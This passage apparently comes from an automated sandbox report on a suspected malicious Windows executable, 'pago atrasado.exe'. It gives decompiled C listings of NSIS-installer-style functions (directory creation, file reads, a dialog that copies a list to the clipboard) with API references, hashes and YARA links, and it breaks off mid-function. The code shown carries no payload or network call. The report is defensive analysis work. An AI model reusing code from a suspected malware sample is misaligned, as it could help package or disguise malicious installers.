                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                            • Instruction ID: 81e3be7da977fa0fdb855dbc2a497946ad1e8e9610c44c99cc48e92da118c7e0
                                            • Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                            • Instruction Fuzzy Hash: C2C00271808501AAD6016B34EE0D81F7B66EB54321B148B25F469A01F0C7315C66DA2A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004053C3, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004053C3(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                            0x004053c9
                                            0x004053d1
                                            0x00000000
                                            0x004053d7
                                            0x00000000

                                            APIs
                                            • CreateDirectoryA.KERNEL32(?,00000000,004030EE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 004053C9
                                            • GetLastError.KERNEL32 ref: 004053D7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CreateDirectoryErrorLast
                                            • String ID:
                                            • API String ID: 1375471231-0
                                            • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                            • Instruction ID: 6b45de36f316d487aa01e9413b839baa5bb3cf32c01ac4838d60d751b980a7e6
                                            • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                            • Instruction Fuzzy Hash: E0C04C30619642DBD7105B31ED08B177E60EB50781F208935A506F11E0D6B4D451DD3E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00403081, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00403081(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                            0x00403085
                                            0x00403098
                                            0x004030a0
                                            0x00000000
                                            0x004030a7
                                            0x00000000
                                            0x004030a9

                                            APIs
                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,00402EDA,000000FF,00000004,00000000,00000000,00000000), ref: 00403098
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                            • Instruction ID: e4cef5105026143dd13b930ce46becb45ea6c66ba88fb4286e933b642882ba15
                                            • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                            • Instruction Fuzzy Hash: F3E08631211118FBDF209E51EC00A973B9CDB04362F008032B904E5190D538DA10DBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 10008872, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 25%
                                            			E10008872() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t7;

				_push(1);
				_push(0);
				_push(0); // executed
				_t1 = E100088D9(_t2, _t3, _t4, _t7); // executed
				return _t1;
			}








                                            0x10008872
                                            0x10008874
                                            0x10008876
                                            0x10008878
                                            0x10008880

                                            APIs
                                            • _doexit.LIBCMT ref: 10008878
                                              • Part of subcall function 100088D9: __lock.LIBCMT ref: 100088E7
                                              • Part of subcall function 100088D9: RtlDecodePointer.NTDLL(10019048,0000001C,1000886D,?,00000001,00000000,?,1000864A,000000FF,?,10009F2B,00000011,?,?,1000CB2C,0000000D), ref: 10008926
                                              • Part of subcall function 100088D9: DecodePointer.KERNEL32(?,1000864A,000000FF,?,10009F2B,00000011,?,?,1000CB2C,0000000D), ref: 10008937
                                              • Part of subcall function 100088D9: EncodePointer.KERNEL32(00000000,?,1000864A,000000FF,?,10009F2B,00000011,?,?,1000CB2C,0000000D), ref: 10008950
                                              • Part of subcall function 100088D9: DecodePointer.KERNEL32(-00000004,?,1000864A,000000FF,?,10009F2B,00000011,?,?,1000CB2C,0000000D), ref: 10008960
                                              • Part of subcall function 100088D9: EncodePointer.KERNEL32(00000000,?,1000864A,000000FF,?,10009F2B,00000011,?,?,1000CB2C,0000000D), ref: 10008966
                                              • Part of subcall function 100088D9: DecodePointer.KERNEL32(?,1000864A,000000FF,?,10009F2B,00000011,?,?,1000CB2C,0000000D), ref: 1000897C
                                              • Part of subcall function 100088D9: DecodePointer.KERNEL32(?,1000864A,000000FF,?,10009F2B,00000011,?,?,1000CB2C,0000000D), ref: 10008987
                                              • Part of subcall function 100088D9: __initterm.LIBCMT ref: 100089AF
                                              • Part of subcall function 100088D9: __initterm.LIBCMT ref: 100089C0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Pointer$Decode$Encode__initterm$__lock_doexit
                                            • String ID:
                                            • API String ID: 3712619029-0
                                            • Opcode ID: 20a20f608ea4bc6c94e18f730bbbe563946a4bfee6b1cba253202f95a216a98f
                                            • Instruction ID: 744bbbe286876aa1c4a0d58eba5af4a6dd6ab550502f5fb5309f8cdb1ca7ff02
                                            • Opcode Fuzzy Hash: 20a20f608ea4bc6c94e18f730bbbe563946a4bfee6b1cba253202f95a216a98f
                                            • Instruction Fuzzy Hash: 5DA00269BD430021F86091902C43F5526516750F51FD44050FB4D2C1C5E8C623584357
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004030B3, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004030B3(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                                            0x004030c1
                                            0x004030c7

                                            APIs
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00402E1C,000081E4), ref: 004030C1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                            • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
                                            • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                            • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004056B6, Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004056B6(CHAR* _a4, intOrPtr _a8) {
				CHAR* _t3;
				char _t4;

				_t3 = _a4;
				while(1) {
					_t4 =  *_t3;
					if(_t4 == 0) {
						break;
					}
					if(_t4 != _a8) {
						_t3 = CharNextA(_t3); // executed
						continue;
					}
					break;
				}
				return _t3;
			}





                                            0x004056b6
                                            0x004056c9
                                            0x004056c9
                                            0x004056cd
                                            0x00000000
                                            0x00000000
                                            0x004056c0
                                            0x004056c3
                                            0x00000000
                                            0x004056c3
                                            0x00000000
                                            0x004056c0
                                            0x004056cf

                                            APIs
                                            • CharNextA.USER32(?,004031E6,"C:\Users\user\Desktop\pago atrasado.exe" ,00409168), ref: 004056C3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CharNext
                                            • String ID:
                                            • API String ID: 3213498283-0
                                            • Opcode ID: b78f2958c7f68e19d57b7ad513a89c73604121592eb64134f43146a97932e323
                                            • Instruction ID: b92c2b2cc925d09e3655dddfc00fa39e31e8eee3e0a1cce73cff96a1e9958276
                                            • Opcode Fuzzy Hash: b78f2958c7f68e19d57b7ad513a89c73604121592eb64134f43146a97932e323
                                            • Instruction Fuzzy Hash: B7C0806440C74057D611471040345777FF0AA91750F945C5EF0C963170C1357C408F3B
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 00404FC2, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 96%
                                            			E00404FC2(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423724; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404F56, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405BBA(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x420538;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42370c - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x423f48, 8);
							__eflags =  *0x423fcc - _t149; // 0x0
							if(__eflags == 0) {
								E00404E84( *((intOrPtr*)( *0x41fd08 + 0x34)), _t149);
							}
							E00403E2D(1);
							goto L25;
						}
						 *0x41f900 = 2;
						E00403E2D(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403EBB(_a8, _a12, _a16);
						}
						ShowWindow( *0x423710, _t149);
						ShowWindow(_t154, 8);
						E00403E89(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423f50; // 0x661638
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423710 = GetDlgItem(_a4, 0x403);
				 *0x423708 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423724 = _t127;
				_v8 = _t127;
				E00403E89( *0x423710);
				 *0x423714 = E00404726(4);
				 *0x42372c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E54(_a4);
				if(( *0x423f58 & 0x00000003) != 0) {
					ShowWindow( *0x423710, _t149);
					if(( *0x423f58 & 0x00000002) != 0) {
						 *0x423710 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403E89( *0x423708);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423f58 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}


































                                            0x00404fcb
                                            0x00404fd1
                                            0x00404fda
                                            0x00404fdd
                                            0x0040516e
                                            0x00405175
                                            0x00405199
                                            0x00405199
                                            0x0040519f
                                            0x004051ac
                                            0x004051ca
                                            0x004051ca
                                            0x004051d1
                                            0x00405228
                                            0x00405228
                                            0x0040522c
                                            0x00000000
                                            0x00000000
                                            0x0040522e
                                            0x00405231
                                            0x00000000
                                            0x00000000
                                            0x0040523b
                                            0x00405241
                                            0x00405243
                                            0x00405246
                                            0x0040533f
                                            0x00000000
                                            0x0040533f
                                            0x00405255
                                            0x00405261
                                            0x00405267
                                            0x0040526a
                                            0x0040526d
                                            0x00405282
                                            0x00405285
                                            0x00405285
                                            0x00405288
                                            0x0040526f
                                            0x00405274
                                            0x0040527a
                                            0x0040527d
                                            0x0040527d
                                            0x00405298
                                            0x004052a0
                                            0x004052a1
                                            0x004052a3
                                            0x004052ac
                                            0x004052af
                                            0x004052b6
                                            0x004052bd
                                            0x004052c5
                                            0x004052c5
                                            0x004052d3
                                            0x004052d9
                                            0x004052dc
                                            0x004052dc
                                            0x004052e3
                                            0x004052e9
                                            0x004052f2
                                            0x004052f9
                                            0x00405302
                                            0x00405304
                                            0x00405307
                                            0x00405316
                                            0x00405318
                                            0x0040531e
                                            0x0040531f
                                            0x00405320
                                            0x00405320
                                            0x00405328
                                            0x00405333
                                            0x00405339
                                            0x00405339
                                            0x00000000
                                            0x004052a3
                                            0x004051d3
                                            0x004051d9
                                            0x00405209
                                            0x0040520b
                                            0x00405211
                                            0x0040521c
                                            0x0040521c
                                            0x00405223
                                            0x00000000
                                            0x00405223
                                            0x004051dd
                                            0x004051e7
                                            0x00000000
                                            0x004051ae
                                            0x004051ae
                                            0x004051b4
                                            0x004051ec
                                            0x00000000
                                            0x004051f5
                                            0x004051bd
                                            0x004051c2
                                            0x004051c5
                                            0x00000000
                                            0x004051c5
                                            0x004051ac
                                            0x00404fe3
                                            0x00404fe7
                                            0x00404ff0
                                            0x00404ff7
                                            0x00404ffa
                                            0x00404ffd
                                            0x00405000
                                            0x00405001
                                            0x00405002
                                            0x0040501b
                                            0x0040501e
                                            0x00405028
                                            0x00405037
                                            0x0040503f
                                            0x00405047
                                            0x0040504c
                                            0x0040504f
                                            0x0040505b
                                            0x00405064
                                            0x0040506d
                                            0x00405090
                                            0x00405096
                                            0x004050a7
                                            0x004050ac
                                            0x004050ba
                                            0x004050c8
                                            0x004050c8
                                            0x004050cd
                                            0x004050db
                                            0x004050db
                                            0x004050e0
                                            0x004050e3
                                            0x004050e8
                                            0x004050f4
                                            0x004050fd
                                            0x0040510a
                                            0x00405119
                                            0x0040510c
                                            0x00405111
                                            0x00405111
                                            0x00405125
                                            0x00405125
                                            0x00405139
                                            0x00405142
                                            0x0040514b
                                            0x0040515b
                                            0x00405167
                                            0x00405167
                                            0x00000000

                                            APIs
                                            • GetDlgItem.USER32 ref: 00405021
                                            • GetDlgItem.USER32 ref: 00405030
                                            • GetClientRect.USER32 ref: 0040506D
                                            • GetSystemMetrics.USER32 ref: 00405075
                                            • SendMessageA.USER32 ref: 00405096
                                            • SendMessageA.USER32 ref: 004050A7
                                            • SendMessageA.USER32 ref: 004050BA
                                            • SendMessageA.USER32 ref: 004050C8
                                            • SendMessageA.USER32 ref: 004050DB
                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004050FD
                                            • ShowWindow.USER32(?,00000008), ref: 00405111
                                            • GetDlgItem.USER32 ref: 00405132
                                            • SendMessageA.USER32 ref: 00405142
                                            • SendMessageA.USER32 ref: 0040515B
                                            • SendMessageA.USER32 ref: 00405167
                                            • GetDlgItem.USER32 ref: 0040503F
                                              • Part of subcall function 00403E89: SendMessageA.USER32 ref: 00403E97
                                            • GetDlgItem.USER32 ref: 00405184
                                            • CreateThread.KERNEL32 ref: 00405192
                                            • CloseHandle.KERNEL32(00000000), ref: 00405199
                                            • ShowWindow.USER32(00000000), ref: 004051BD
                                            • ShowWindow.USER32(00000000,00000008), ref: 004051C2
                                            • ShowWindow.USER32(00000008), ref: 00405209
                                            • SendMessageA.USER32 ref: 0040523B
                                            • CreatePopupMenu.USER32 ref: 0040524C
                                            • AppendMenuA.USER32 ref: 00405261
                                            • GetWindowRect.USER32 ref: 00405274
                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405298
                                            • SendMessageA.USER32 ref: 004052D3
                                            • OpenClipboard.USER32(00000000), ref: 004052E3
                                            • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004052E9
                                            • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004052F2
                                            • GlobalLock.KERNEL32 ref: 004052FC
                                            • SendMessageA.USER32 ref: 00405310
                                            • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405328
                                            • SetClipboardData.USER32 ref: 00405333
                                            • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 00405339
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                            • String ID: {
                                            • API String ID: 590372296-366298937
                                            • Opcode ID: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                                            • Instruction ID: 6929f331228a41c4e1f6bf5049925f100d3ed94cd800429e98060a15954be78d
                                            • Opcode Fuzzy Hash: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                                            • Instruction Fuzzy Hash: 6DA13AB1900208BFDB119F60DD89AAE7F79FB44355F00813AFA05BA1A0C7795E41DFA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004047D3, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 98%
                                            			E004047D3(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423f68; // 0x6617e4
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x423f50; // 0x661638
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x423f59 & 0x00000002;
							if(( *0x423f59 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404753(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x423f58; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x420514;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x42052c;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x420514 = _t315;
									 *0x42052c = _t315;
									 *0x423fa0 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x423f59 & 0x00000001;
										if(( *0x423f59 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x423f6c - _t315; // 0x2
										_v32 =  *0x42052c;
										_t196 =  *0x423f68; // 0x6617e4
										_v60 = 0xf030;
